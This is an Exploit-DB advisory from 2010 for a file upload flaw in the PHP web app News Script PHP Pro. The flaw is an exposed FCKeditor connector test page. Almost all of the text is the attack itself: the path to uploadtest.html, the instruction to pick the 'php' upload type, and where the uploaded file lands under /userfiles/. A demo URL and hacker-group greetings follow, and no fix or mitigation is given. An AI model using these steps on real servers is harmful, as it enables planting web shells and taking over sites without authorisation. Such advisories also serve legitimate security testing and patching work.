News Script PHP Pro - (fckeditor) File Upload Vulnerability

EDB-ID: 15843 CVE: N/A OSVDB-ID: N/A
Verified: Author: Net.Edit0r Published: 2010-12-29
Download Exploit: Source Raw Download Vulnerable App: N/A
                                
==============================================================================
  
        [»] News Script PHP Pro (fckeditor) File Upload Vulnerability
  
==============================================================================
  
    [»] Title   :           [ News Script PHP Pro (fckeditor) File Upload Vulnerability ]
  
    [»] Script  :           [ News Script PHP Pro  ]
  
    [»] TestedON:           [ linux/php ]
  
    [»] Download:           [ http://newsscriptphp.com/ ]
  
    [»] Author  :           [ Net.Edit0r }
  
    [»] Email   :           [ black.hat.tm@gmail.com ]
  
    [»] Date    :           [ 2010-12-26 ]
   
    [»] Version :           [ Full Version ]

    [»] CVE     :           [Web Applications]
  
###########################################################################
  
     
===[ Exploit ]===    ./Iranian HackerZ
  
  [»] http://server/[patch]/fckeditor/editor/filemanager/connectors/uploadtest.html
  
  [»] Select the "File Upload" To use = php
 
===[ Upload To ]===
 
  [»] http://server/[patch]/userfiles/Name File
 
===[ Demo ]===

  [»] http://server/news/fckeditor/editor/filemanager/connectors/uploadtest.html
 
Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , M4hd1 , Ali.Erroor 
 
     BHG : Net.Edit0r ~ Darkcoder ~ keracker
                                   
###########################################################################